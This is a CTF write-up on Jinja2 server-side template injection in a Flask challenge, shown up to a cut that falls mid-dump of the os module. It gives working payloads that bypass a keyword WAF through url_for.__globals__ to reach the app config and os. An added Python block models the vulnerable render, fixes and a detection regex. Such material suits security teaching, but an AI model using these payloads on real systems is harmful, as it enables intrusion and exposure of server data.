Tags: web ssti 

# ▼▼▼Believer Case (Web: 447 points, 39/123 = 31.7%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
We managed to hack one of the systems, and its owner contacted us back. He asked us to check his fix. We did not find anything. Can you?

http://185.168.131.123
```

---

```
GET / HTTP/1.1
Host: 185.168.131.123
```

```
Hello! I have been contacted by those who try to save the network. I tried to protect myself. Can you test out if I am secure now? See this
```

---

```
GET /test HTTP/1.1
Host: 185.168.131.123
```

```
test
```

The string entered in the URL path is reflected in the response!!

---

## 【Identify the vulnerability】

My first intuition was SSTI (Server Side Template Injection)

```
GET /{{7*7}} HTTP/1.1
Host: 185.168.131.123
```

```
49
```

The expression was evaluated!! **SSTI via Jinja2!!**

---

※The error message below also mentions jinja2, which confirms the engine

```
GET /{{__selt__.__doc__}} HTTP/1.1
Host: 185.168.131.123
```

```
The default undefined type. This undefined type can be printed and
iterated over, but every other access will raise an :exc:`jinja2.exceptions.UndefinedError`:

>>> foo = Undefined(name='foo')
>>> str(foo)
''
>>> not foo
True
>>> foo + 42
Traceback (most recent call last):
...
jinja2.exceptions.UndefinedError: 'foo' is undefined
```

`jinja2` appears in the output.

---

## 【Identify WAF】

For the list of attributes reachable under `self`, see my earlier TWCTF (Web: shrine) writeup:

`https://ctftime.org/writeup/10895`

---

```
GET /{{self}}    ⇒ 500 error   WAF
GET /{{config}}  ⇒ 500 error   WAF
GET /{{request}} ⇒ 500 error   WAF
GET /{{g}}       ⇒ <flask.g of 'app'>                    usable
GET /{{url_for}} ⇒ <function url_for at 0x7fde0c3b7a28>  usable

GET /{{[]}} ⇒ 500 error   WAF
GET /{{''}} ⇒ 200 OK      usable
GET /{{()}} ⇒ 200 OK      usable
```

---

## 【Look for flag via current_app from url_for attribute】

```
GET /{{url_for.__globals__}}
```

```
{'find_package': <function find_package at 0x7fde0c3b7e60>, '_PackageBoundObject': <class 'flask.helpers._PackageBoundObject'>, 'get_load_dotenv': <function get_load_dotenv at 0x7fde0c3b7848>, 'is_ip': <function is_ip at 0x7fde0c3c1578>, 'current_app': <Flask 'app'>, 'PY2': True, 'send_from_directory': <function send_from_directory at 0x7fde0c3b7cf8>, 'session': <NullSession {}>, 'get_flashed_messages': <function get_flashed_messages at 0x7fde0c3b7b90>, 'BadRequest': <class 'werkzeug.exceptions.BadRequest'>, 'posixpath': <module 'posixpath' from '/usr/lib/python2.7/posixpath.pyc'>, 'BuildError': <class 'werkzeug.routing.BuildError'>, 'url_quote': <function url_quote at 0x7fde0cc09410>, 'FileSystemLoader': <class 'jinja2.loaders.FileSystemLoader'>, 'get_root_path': <function get_root_path at 0x7fde0c3b7d70>, '__package__': 'flask', 'locked_cached_property': <class 'flask.helpers.locked_cached_property'>, '_app_ctx_stack': <werkzeug.local.LocalStack object at 0x7fde0c3b0e90>, '_endpoint_from_view_func': <function _endpoint_from_view_func at 0x7fde0c3b78c0>, 'total_seconds': <function total_seconds at 0x7fde0c3b7ed8>, 'get_env': <function get_env at 0x7fde0c3b7578>, '__doc__': '\n flask.helpers\n ~~~~~~~~~~~~~\n\n Implements various helpers.\n\n :copyright: \xc2\xa9 2010 by the Pallets team.\n :license: BSD, see LICENSE for more details.\n', 'flash': <function flash at 0x7fde0c3b7b18>, 'mimetypes': <module 'mimetypes' from '/usr/lib/python2.7/mimetypes.pyc'>, 'adler32': <built-in function adler32>, 'get_template_attribute': <function get_template_attribute at 0x7fde0c3b7aa0>, '_request_ctx_stack': <werkzeug.local.LocalStack object at 0x7fde0c3a49d0>, '__builtins__': {'bytearray': <type 'bytearray'>, 'IndexError': <type 'exceptions.IndexError'>, 'all': <built-in function all>, 'help': Type help() for interactive help, or help(object) for help about object., 'vars': <built-in function vars>, 'SyntaxError': <type 'exceptions.SyntaxError'>, 'unicode': <type 'unicode'>, 
'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>, 'memoryview': <type 'memoryview'>, 'isinstance': <built-in function isinstance>, 'copyright': Copyright (c) 2001-2016 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'NameError': <type 'exceptions.NameError'>, 'BytesWarning': <type 'exceptions.BytesWarning'>, 'dict': <type 'dict'>, 'input': <built-in function input>, 'oct': <built-in function oct>, 'bin': <built-in function bin>, 'SystemExit': <type 'exceptions.SystemExit'>, 'StandardError': <type 'exceptions.StandardError'>, 'format': <built-in function format>, 'repr': <built-in function repr>, 'sorted': <built-in function sorted>, 'False': False, 'RuntimeWarning': <type 'exceptions.RuntimeWarning'>, 'list': <type 'list'>, 'iter': <built-in function iter>, 'reload': <built-in function reload>, 'Warning': <type 'exceptions.Warning'>, '__package__': None, 'round': <built-in function round>, 'dir': <built-in function dir>, 'cmp': <built-in function cmp>, 'set': <type 'set'>, 'bytes': <type 'str'>, 'reduce': <built-in function reduce>, 'intern': <built-in function intern>, 'issubclass': <built-in function issubclass>, 'Ellipsis': Ellipsis, 'EOFError': <type 'exceptions.EOFError'>, 'locals': <built-in function locals>, 'BufferError': <type 'exceptions.BufferError'>, 'slice': <type 'slice'>, 'FloatingPointError': <type 'exceptions.FloatingPointError'>, 'sum': <built-in function sum>, 'getattr': <built-in function getattr>, 'abs': <built-in function abs>, 'exit': Use exit() or Ctrl-D (i.e. 
EOF) to exit, 'print': <built-in function print>, 'True': True, 'FutureWarning': <type 'exceptions.FutureWarning'>, 'ImportWarning': <type 'exceptions.ImportWarning'>, 'None': None, 'hash': <built-in function hash>, 'ReferenceError': <type 'exceptions.ReferenceError'>, 'len': <built-in function len>, 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'frozenset': <type 'frozenset'>, '__name__': '__builtin__', 'ord': <built-in function ord>, 'super': <type 'super'>, 'TypeError': <type 'exceptions.TypeError'>, 'license': Type license() to see the full license text, 'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>, 'UserWarning': <type 'exceptions.UserWarning'>, 'filter': <built-in function filter>, 'range': <built-in function range>, 'staticmethod': <type 'staticmethod'>, 'SystemError': <type 'exceptions.SystemError'>, 'BaseException': <type 'exceptions.BaseException'>, 'pow': <built-in function pow>, 'RuntimeError': <type 'exceptions.RuntimeError'>, 'float': <type 'float'>, 'MemoryError': <type 'exceptions.MemoryError'>, 'StopIteration': <type 'exceptions.StopIteration'>, 'globals': <built-in function globals>, 'divmod': <built-in function divmod>, 'enumerate': <type 'enumerate'>, 'apply': <built-in function apply>, 'LookupError': <type 'exceptions.LookupError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'basestring': <type 'basestring'>, 'UnicodeError': <type 'exceptions.UnicodeError'>, 'zip': <built-in function zip>, 'hex': <built-in function hex>, 'long': <type 'long'>, 'next': <built-in function next>, 'ImportError': <type 'exceptions.ImportError'>, 'chr': <built-in function chr>, 'xrange': <type 'xrange'>, 'type': <type 'type'>, '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' 
in slices.", 'Exception': <type 'exceptions.Exception'>, 'tuple': <type 'tuple'>, 'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>, 'reversed': <type 'reversed'>, 'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>, 'IOError': <type 'exceptions.IOError'>, 'hasattr': <built-in function hasattr>, 'delattr': <built-in function delattr>, 'setattr': <built-in function setattr>, 'raw_input': <built-in function raw_input>, 'SyntaxWarning': <type 'exceptions.SyntaxWarning'>, 'compile': <built-in function compile>, 'ArithmeticError': <type 'exceptions.ArithmeticError'>, 'str': <type 'str'>, 'property': <type 'property'>, 'GeneratorExit': <type 'exceptions.GeneratorExit'>, 'int': <type 'int'>, '__import__': <built-in function __import__>, 'KeyError': <type 'exceptions.KeyError'>, 'coerce': <built-in function coerce>, 'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>, 'file': <type 'file'>, 'EnvironmentError': <type 'exceptions.EnvironmentError'>, 'unichr': <built-in function unichr>, 'id': <built-in function id>, 'OSError': <type 'exceptions.OSError'>, 'DeprecationWarning': <type 'exceptions.DeprecationWarning'>, 'min': <built-in function min>, 'UnicodeWarning': <type 'exceptions.UnicodeWarning'>, 'execfile': <built-in function execfile>, 'any': <built-in function any>, 'complex': <type 'complex'>, 'bool': <type 'bool'>, 'ValueError': <type 'exceptions.ValueError'>, 'NotImplemented': NotImplemented, 'map': <built-in function map>, 'buffer': <type 'buffer'>, 'max': <built-in function max>, 'object': <type 'object'>, 'TabError': <type 'exceptions.TabError'>, 'callable': <built-in function callable>, 'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>, 'eval': <built-in function eval>, '__debug__': True, 'IndentationError': <type 'exceptions.IndentationError'>, 'AssertionError': <type 'exceptions.AssertionError'>, 'classmethod': <type 'classmethod'>, 'UnboundLocalError': <type 'exceptions.UnboundLocalError'>, 
'NotImplementedError': <type 'exceptions.NotImplementedError'>, 'AttributeError': <type 'exceptions.AttributeError'>, 'OverflowError': <type 'exceptions.OverflowError'>}, 'text_type': <type 'unicode'>, '__file__': '/usr/local/lib/python2.7/dist-packages/flask/helpers.pyc', 'get_debug_flag': <function get_debug_flag at 0x7fde0c3b77d0>, 'RLock': <function RLock at 0x7fde0d293398>, 'safe_join': <function safe_join at 0x7fde0c3b7c80>, 'sys': <module 'sys' (built-in)>, 'Headers': <class 'werkzeug.datastructures.Headers'>, 'Range': <class 'werkzeug.datastructures.Range'>, 'stream_with_context': <function stream_with_context at 0x7fde0c3b7938>, '_os_alt_seps': [], '__name__': 'flask.helpers', '_missing': <object object at 0x7fde0fd7b200>, 'pkgutil': <module 'pkgutil' from '/usr/lib/python2.7/pkgutil.pyc'>, 'NotFound': <class 'werkzeug.exceptions.NotFound'>, 'unicodedata': <module 'unicodedata' (built-in)>, 'wrap_file': <function wrap_file at 0x7fde0cc20050>, 'socket': <module 'socket' from '/usr/lib/python2.7/socket.pyc'>, 'update_wrapper': <function update_wrapper at 0x7fde0fd58b90>, 'make_response': <function make_response at 0x7fde0c3b79b0>, 'request': <Request 'http://185.168.131.123/{{url_for.__globals__}}' [GET]>, 'string_types': (<type 'str'>, <type 'unicode'>), 'message_flashed': <flask.signals._FakeSignal object at 0x7fde0c3bf2d0>, 'RequestedRangeNotSatisfiable': <class 'werkzeug.exceptions.RequestedRangeNotSatisfiable'>, 'send_file': <function send_file at 0x7fde0c3b7c08>, 'time': <built-in function time>, 'url_for': <function url_for at 0x7fde0c3b7a28>, '_matching_loader_thinks_module_is_package': <function _matching_loader_thinks_module_is_package at 0x7fde0c3b7de8>, 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>}
```

`current_app` is discovered!!

---

```
GET /{{url_for.__globals__['current_app']}} ⇒ 500 error   WAF
```

---

```
GET /{{url_for.__globals__.current_app}} ⇒<Flask 'app'>
```
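As an added example (not part of this writeup or the challenge's code), a minimal Python model of what the requests above show: the URL path is compiled as a Jinja2 template, a token blacklist like the one probed in the WAF section does not stop attribute-style access through a helper function's `__globals__`, and the two fixes a defender would actually apply (treat the path as data, or at least render in the sandbox). `helper` and `SECRET_KEY` are constructed stand-ins for `url_for` and the app config.

```python
"""Model of the Believer Case bug: path is compiled as a Jinja2 template."""
import re

from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed stand-in for the value an attacker is after (e.g. app config).
SECRET_KEY = "constructed-secret-not-from-the-challenge"


def helper():
    """Stand-in for a Flask helper such as url_for: every module-level
    function exposes its defining module's namespace via __globals__."""
    return "ok"


def render_vulnerable(path: str) -> str:
    """The challenge pattern: user input becomes template SOURCE."""
    env = Environment()
    return env.from_string(path).render(helper=helper)


# The kind of "fix" the challenge owner applied: a few rejected tokens.
BLACKLIST = ("self", "config", "request", "[")


def render_blacklisted(path: str) -> str:
    """Blacklist in front of the same vulnerable render.
    Returns "500" for rejected input, mirroring the 500 errors seen above."""
    if any(token in path for token in BLACKLIST):
        return "500"
    return render_vulnerable(path)


def render_fixed(path: str) -> str:
    """Correct fix: the template is a constant and the path is DATA, so
    template syntax in the path is printed, never evaluated."""
    env = Environment(autoescape=True)
    return env.from_string("{{ path }}").render(path=path)


def render_sandboxed(path: str) -> str:
    """Defence in depth when untrusted template source is unavoidable:
    the sandbox refuses attributes starting with '_' such as __globals__.
    Returns "403" when the sandbox raises SecurityError."""
    env = SandboxedEnvironment()
    try:
        return env.from_string(path).render(helper=helper)
    except SecurityError:
        return "403"


# Template delimiters never belong in a path of this app, so their
# presence is a cheap detection signal even when the render is blocked.
PROBE_RE = re.compile(r"\{\{|\{%|\$\{|<%")


def looks_like_template_probe(path: str) -> bool:
    return PROBE_RE.search(path) is not None


if __name__ == "__main__":
    probe = "{{helper.__globals__.SECRET_KEY}}"
    print("vulnerable :", render_vulnerable("{{7*7}}"))           # 49
    print("blacklist  :", render_blacklisted(probe))              # secret leaks
    print("fixed      :", render_fixed("{{7*7}}"))                # {{7*7}}
    print("sandboxed  :", render_sandboxed(probe))                # 403
    print("detected   :", looks_like_template_probe("/" + probe))  # True
```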

---

```
GET /{{url_for.__globals__.current_app.__dict__}}
```

```
{'subdomain_matching': False, 'error_handler_spec': {None: {}}, '_before_request_lock': <thread.lock object at 0x7fde0c62b730>, 'jinja_env': <flask.templating.Environment object at 0x7fde0c38fe50>, 'before_request_funcs': {}, 'teardown_appcontext_funcs': [], 'shell_context_processors': [], 'after_request_funcs': {}, 'cli': <flask.cli.AppGroup object at 0x7fde0c38f990>, '_blueprint_order': [], 'before_first_request_funcs': [], 'view_functions': {'blacklist_template': <function blacklist_template at 0x7fde0c38bb18>, 'index_template': <function index_template at 0x7fde0c38baa0>, 'static': <bound method Flask.send_static_file of <Flask 'app'>>}, 'instance_path': '/opt/app/instance', 'teardown_request_funcs': {}, 'logger': <logging.Logger object at 0x7fde0c38fb90>, 'url_value_preprocessors': {}, 'config': <Config {'JSON_AS_ASCII': True, 'USE_X_SENDFILE': False, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_DOMAIN': None, 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'SESSION_COOKIE_SAMESITE': None, 'PROPAGATE_EXCEPTIONS': None, 'ENV': 'production', 'DEBUG': False, 'SECRET_KEY': None, 'EXPLAIN_TEMPLATE_LOADING': False, 'MAX_CONTENT_LENGTH': None, 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'JSONIFY_PRETTYPRINT_REGULAR': False, 'TESTING': False, 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'TEMPLATES_AUTO_RELOAD': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'JSONIFY_MIMETYPE': 'application/json', 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'TRAP_HTTP_EXCEPTIONS': False}>, '_static_url_path': None, 'jinja_loader': <jinja2.loaders.FileSystemLoader object at 0x7fde0c270f90>, 'template_context_processors': {None: [<function _default_template_ctx_processor at 0x7fde0c374ed8>]}, 'template_folder': 'templates', 'blueprints': {}, 'url_map': Map([<Rule 
'/' (HEAD, OPTIONS, GET) -> index_template>, <Rule '/static/<filename>' (HEAD, OPTIONS, GET) -> static>, <Rule '/<template>' (HEAD, OPTIONS, GET) -> blacklist_template>]), 'name': 'app', '_got_first_request': True, 'import_name': 'app', 'root_path': '/opt/app', '_static_folder': 'static', 'extensions': {}, 'url_default_functions': {}, 'url_build_error_handlers': []}
```

---

```
GET /{{url_for.__globals__.os.__dict__}}
```

```
{'WTERMSIG': <built-in function WTERMSIG>, 'lseek': <built-in function lseek>, 'EX_IOERR': 74, 'EX_NOHOST': 68, 'seteuid': <built-in function seteuid>, 'pathsep': ':', 'execle': <function execle at 0x7fde0fdf4de8>, 'major': <built-in function major>, '_Environ': <class os._Environ at 0x7fde0fde8ef0>, 'fstatvfs': <built-in function fstatvfs>, 'uname': <built-in function uname>, 'kill': <built-in function kill>, 'urandom': <built-in function urandom>, 'execlp': <function execlp at 0x7fde0fdf4e60>, 'ST_RELATIME': 4096, 'getegid': <built-in function getegid>, 'getresgid': <built-in function getresgid>, 'EX_OSFILE': 72, 'umask': <built-in function umask>, 'linesep': '\n', 'ST_NODIRATIME': 2048, 'fchmod': <built-in function fchmod>, 'lchown': <built-in function lchown>, 'setgid': <built-in function setgid>, 'tmpnam': <built-in function tmpnam>, 'UserDict': <module 'UserDict' from '/usr/lib/python2.7/UserDict.pyc'>, 'devnull': '/dev/null', 'EX_NOINPUT': 66, 'makedev': <built-in function makedev>, 'fstat': <built-in function fstat>, 'getlogin': <built-in function getlogin>, 'EX_TEMPFAIL': 75, 'O_CREAT': 64, 'dup2': <built-in function dup2>, 'read': <built-in function read>, '__file__': '/usr/lib/python2.7/os.pyc', 'getppid': <built-in function getppid>, 'fchown': <built-in function fchown>, 'getloadavg': <built-in function getloadavg>, 'WIFSTOPPED': <built-in function WIFSTOPPED>, 'getpgrp': <built-in function getpgrp>, '_spawnvef': <function _spawnvef at 0x7fde0fdfd2a8>, 'TMP_MAX': 238328, 'utime': <built-in function utime>, 'execl': <function execl at 0x7fde0fdf4d70>, 'ST_SYNCHRONOUS': 16, 'F_OK': 0, '_make_stat_result': <function _make_stat_result at 0x7fde0fdfdd70>, 'ST_WRITE': 128, 'fsync': <built-in function fsync>, 'tcsetpgrp': <built-in function tcsetpgrp>, 'statvfs': <built-in function statvfs>, 'setreuid': <built-in function setreuid>, 'remove': <built-in function remove>, 'setegid': <built-in function setegid>, 'P_NOWAITO': 1, '_copy_reg': <module 'copy_reg' 
from '/usr/lib/python2.7/copy_reg.pyc'>, 'execv': <built-in function execv>, 'spawnv': <function spawnv at 0x7fde0fdfd320>, 'spawnvpe': <function spawnvpe at 0x7fde0fdfd488>, 'EX_OSERR': 71, 'ttyname': <built-in function ttyname>, 'pardir': '..', 'tempnam': <built-in function tempnam>, 'tmpfile': <built-in function tmpfile>, 'sep': '/', 'mkfifo': <built-in function mkfifo>, 'O_NOFOLLOW': 131072, 'defpath': ':/bin:/usr/bin', 'popen2': <function popen2 at 0x7fde0fdfd6e0>, 'stat': <built-in function stat>, 'O_APPEND': 1024, 'EX_CANTCREAT': 73, 'getresuid': <built-in function getresuid>, 'mknod': <built-in function mknod>, 'O_NOCTTY': 256, 'close': <built-in function close>, 'getgid': <built-in function getgid>, 'ctermid': <built-in function ctermid>, 'WIFSIGNALED': <built-in function WIFSIGNALED>, '_exists': <function _exists at 0x7fde0fdfd230>, 'killpg': <built-in function killpg>, '__all__': ['altsep', 'curdir', 'pardir', 'sep', 'extsep', 'pathsep', 'linesep', 'defpath', 'name', 'path', 'devnull', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END', 'EX_CANTCREAT', 'EX_CONFIG', 'EX_DATAERR', 'EX_IOERR', 'EX_NOHOST', 'EX_NOINPUT', 'EX_NOPERM', 'EX_NOUSER', 'EX_OK', 'EX_OSERR', 'EX_OSFILE', 'EX_PROTOCOL', 'EX_SOFTWARE', 'EX_TEMPFAIL', 'EX_UNAVAILABLE', 'EX_USAGE', 'F_OK', 'NGROUPS_MAX', 'O_APPEND', 'O_ASYNC', 'O_CREAT', 'O_DIRECT', 'O_DIRECTORY', 'O_DSYNC', 'O_EXCL', 'O_LARGEFILE', 'O_NDELAY', 'O_NOATIME', 'O_NOCTTY', 'O_NOFOLLOW', 'O_NONBLOCK', 'O_RDONLY', 'O_RDWR', 'O_RSYNC', 'O_SYNC', 'O_TRUNC', 'O_WRONLY', 'R_OK', 'ST_APPEND', 'ST_MANDLOCK', 'ST_NOATIME', 'ST_NODEV', 'ST_NODIRATIME', 'ST_NOEXEC', 'ST_NOSUID', 'ST_RDONLY', 'ST_RELATIME', 'ST_SYNCHRONOUS', 'ST_WRITE', 'TMP_MAX', 'WCONTINUED', 'WCOREDUMP', 'WEXITSTATUS', 'WIFCONTINUED', 'WIFEXITED', 'WIFSIGNALED', 'WIFSTOPPED', 'WNOHANG', 'WSTOPSIG', 'WTERMSIG', 'WUNTRACED', 'W_OK', 'X_OK', 'abort', 'access', 'chdir', 'chmod', 'chown', 'chroot', 'close', 'closerange', 'confstr', 'confstr_names', 'ctermid', 'dup', 'dup2', 'environ', 
'error', 'execv', 'execve', 'fchdir', 'fchmod', 'fchown', 'fdatasync', 'fdopen', 'fork', 'forkpty', 'fpathconf', 'fstat', 'fstatvfs', 'fsync', 'ftruncate', 'getcwd', 'getcwdu', 'getegid', 'geteuid', 'getgid', 'getgroups', 'getloadavg', 'getlogin', 'getpgid', 'getpgrp', 'getpid', 'getppid', 'getresgid', 'getresuid', 'getsid', 'getuid', 'initgroups', 'isatty', 'kill', 'killpg', 'lchown', 'link', 'listdir', 'lseek', 'lstat', 'major', 'makedev', 'minor', 'mkdir', 'mkfifo', 'mknod', 'nice', 'open', 'openpty', 'pathconf', 'pathconf_names', 'pipe', 'popen', 'putenv', 'read', 'readlink', 'remove', 'rename', 'rmdir', 'setegid', 'seteuid', 'setgid', 'setgroups', 'setpgid', 'setpgrp', 'setregid', 'setresgid', 'setresuid', 'setreuid', 'setsid', 'setuid', 'stat', 'stat_float_times', 'stat_result', 'statvfs', 'statvfs_result', 'strerror', 'symlink', 'sysconf', 'sysconf_names', 'system', 'tcgetpgrp', 'tcsetpgrp', 'tempnam', 'times', 'tmpfile', 'tmpnam', 'ttyname', 'umask', 'uname', 'unlink', 'unsetenv', 'urandom', 'utime', 'wait', 'wait3', 'wait4', 'waitpid', 'write', 'makedirs', 'removedirs', 'renames', 'walk', 'execl', 'execle', 'execlp', 'execlpe', 'execvp', 'execvpe', 'getenv', 'spawnv', 'spawnve', 'spawnl', 'spawnle', 'spawnvp', 'spawnvpe', 'spawnlp', 'spawnlpe', 'popen2', 'popen3', 'popen4'], 'ST_APPEND': 256, 'makedirs': <function makedirs at 0x7fde0fdf4b90>, 'setpgid': <built-in function setpgid>, 'getcwdu': <built-in function getcwdu>, 'WNOHANG': 1, 'access': <built-in function access>, 'setsid': <built-in function setsid>, 'NGROUPS_MAX': 65536, 'WIFCONTINUED': <built-in function WIFCONTINUED>, 'O_RDWR': 2, 'P_WAIT': 0, 'stat_result': <type 'posix.stat_result'>, 'walk': <function walk at 0x7fde0fdf4cf8>, 'lstat': <built-in function lstat>, '__builtins__': {'bytearray': <type 'bytearray'>, 'IndexError': <type 'exceptions.IndexError'>, 'all': <built-in function all>, 'help': Type help() for interactive help, or help(object) for help about object., 'vars': <built-in 
function vars>, 'SyntaxError': <type 'exceptions.SyntaxError'>, 'unicode': <type 'unicode'>, 'UnicodeDecodeError': <type 'exceptions.UnicodeDecodeError'>, 'memoryview': <type 'memoryview'>, 'isinstance': <built-in function isinstance>, 'copyright': Copyright (c) 2001-2016 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'NameError': <type 'exceptions.NameError'>, 'BytesWarning': <type 'exceptions.BytesWarning'>, 'dict': <type 'dict'>, 'input': <built-in function input>, 'oct': <built-in function oct>, 'bin': <built-in function bin>, 'SystemExit': <type 'exceptions.SystemExit'>, 'StandardError': <type 'exceptions.StandardError'>, 'format': <built-in function format>, 'repr': <built-in function repr>, 'sorted': <built-in function sorted>, 'False': False, 'RuntimeWarning': <type 'exceptions.RuntimeWarning'>, 'list': <type 'list'>, 'iter': <built-in function iter>, 'reload': <built-in function reload>, 'Warning': <type 'exceptions.Warning'>, '__package__': None, 'round': <built-in function round>, 'dir': <built-in function dir>, 'cmp': <built-in function cmp>, 'set': <type 'set'>, 'bytes': <type 'str'>, 'reduce': <built-in function reduce>, 'intern': <built-in function intern>, 'issubclass': <built-in function issubclass>, 'Ellipsis': Ellipsis, 'EOFError': <type 'exceptions.EOFError'>, 'locals': <built-in function locals>, 'BufferError': <type 'exceptions.BufferError'>, 'slice': <type 'slice'>, 'FloatingPointError': <type 'exceptions.FloatingPointError'>, 'sum': <built-in function sum>, 'getattr': <built-in function getattr>, 'abs': <built-in function abs>, 'exit': Use exit() or Ctrl-D (i.e. 
EOF) to exit, 'print': <built-in function print>, 'True': True, 'FutureWarning': <type 'exceptions.FutureWarning'>, 'ImportWarning': <type 'exceptions.ImportWarning'>, 'None': None, 'hash': <built-in function hash>, 'ReferenceError': <type 'exceptions.ReferenceError'>, 'len': <built-in function len>, 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'frozenset': <type 'frozenset'>, '__name__': '__builtin__', 'ord': <built-in function ord>, 'super': <type 'super'>, 'TypeError': <type 'exceptions.TypeError'>, 'license': Type license() to see the full license text, 'KeyboardInterrupt': <type 'exceptions.KeyboardInterrupt'>, 'UserWarning': <type 'exceptions.UserWarning'>, 'filter': <built-in function filter>, 'range': <built-in function range>, 'staticmethod': <type 'staticmethod'>, 'SystemError': <type 'exceptions.SystemError'>, 'BaseException': <type 'exceptions.BaseException'>, 'pow': <built-in function pow>, 'RuntimeError': <type 'exceptions.RuntimeError'>, 'float': <type 'float'>, 'MemoryError': <type 'exceptions.MemoryError'>, 'StopIteration': <type 'exceptions.StopIteration'>, 'globals': <built-in function globals>, 'divmod': <built-in function divmod>, 'enumerate': <type 'enumerate'>, 'apply': <built-in function apply>, 'LookupError': <type 'exceptions.LookupError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'basestring': <type 'basestring'>, 'UnicodeError': <type 'exceptions.UnicodeError'>, 'zip': <built-in function zip>, 'hex': <built-in function hex>, 'long': <type 'long'>, 'next': <built-in function next>, 'ImportError': <type 'exceptions.ImportError'>, 'chr': <built-in function chr>, 'xrange': <type 'xrange'>, 'type': <type 'type'>, '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' 
in slices.", 'Exception': <type 'exceptions.Exception'>, 'tuple': <type 'tuple'>, 'UnicodeTranslateError': <type 'exceptions.UnicodeTranslateError'>, 'reversed': <type 'reversed'>, 'UnicodeEncodeError': <type 'exceptions.UnicodeEncodeError'>, 'IOError': <type 'exceptions.IOError'>, 'hasattr': <built-in function hasattr>, 'delattr': <built-in function delattr>, 'setattr': <built-in function setattr>, 'raw_input': <built-in function raw_input>, 'SyntaxWarning': <type 'exceptions.SyntaxWarning'>, 'compile': <built-in function compile>, 'ArithmeticError': <type 'exceptions.ArithmeticError'>, 'str': <type 'str'>, 'property': <type 'property'>, 'GeneratorExit': <type 'exceptions.GeneratorExit'>, 'int': <type 'int'>, '__import__': <built-in function __import__>, 'KeyError': <type 'exceptions.KeyError'>, 'coerce': <built-in function coerce>, 'PendingDeprecationWarning': <type 'exceptions.PendingDeprecationWarning'>, 'file': <type 'file'>, 'EnvironmentError': <type 'exceptions.EnvironmentError'>, 'unichr': <built-in function unichr>, 'id': <built-in function id>, 'OSError': <type 'exceptions.OSError'>, 'DeprecationWarning': <type 'exceptions.DeprecationWarning'>, 'min': <built-in function min>, 'UnicodeWarning': <type 'exceptions.UnicodeWarning'>, 'execfile': <built-in function execfile>, 'any': <built-in function any>, 'complex': <type 'complex'>, 'bool': <type 'bool'>, 'ValueError': <type 'exceptions.ValueError'>, 'NotImplemented': NotImplemented, 'map': <built-in function map>, 'buffer': <type 'buffer'>, 'max': <built-in function max>, 'object': <type 'object'>, 'TabError': <type 'exceptions.TabError'>, 'callable': <built-in function callable>, 'ZeroDivisionError': <type 'exceptions.ZeroDivisionError'>, 'eval': <built-in function eval>, '__debug__': True, 'IndentationError': <type 'exceptions.IndentationError'>, 'AssertionError': <type 'exceptions.AssertionError'>, 'classmethod': <type 'classmethod'>, 'UnboundLocalError': <type 'exceptions.UnboundLocalError'>, 
'NotImplementedError': <type 'exceptions.NotImplementedError'>, 'AttributeError': <type 'exceptions.AttributeError'>, 'OverflowError': <type 'exceptions.OverflowError'>}, 'getcwd': <built-in function getcwd>, 'setresgid': <built-in function setresgid>, 'O_NOATIME': 262144, 'EX_SOFTWARE': 70, 'symlink': <built-in function symlink>, 'stat_float_times': <built-in function stat_float_times>, 'extsep': '.', '__name__': 'os', 'O_TRUNC': 512, 'getsid': <built-in function getsid>, 'wait': <built-in function wait>, 'O_DIRECTORY': 65536, 'WCONTINUED': 8, 'SEEK_END': 2, 'ST_NOEXEC': 8, 'openpty': <built-in function openpty>, 'initgroups': <built-in function initgroups>, 'popen': <built-in function popen>, 'times': <built-in function times>, 'P_NOWAIT': 1, 'removedirs': <function removedirs at 0x7fde0fdf4c08>, '_pickle_statvfs_result': <function _pickle_statvfs_result at 0x7fde0fdfded8>, 'renames': <function renames at 0x7fde0fdf4c80>, 'readlink': <built-in function readlink>, '_exit': <built-in function _exit>, 'execlpe': <function execlpe at 0x7fde0fdf4ed8>, 'setregid': <built-in function setregid>, 'O_DSYNC': 4096, 'rename': <built-in function rename>, 'O_RSYNC': 1052672, 'fchdir': <built-in function fchdir>, 'mkdir': <built-in function mkdir>, '_get_exports_list': <function _get_exports_list at 0x7fde0fe246e0>, 'ST_NOSUID': 2, 'WCOREDUMP': <built-in function WCOREDUMP>, 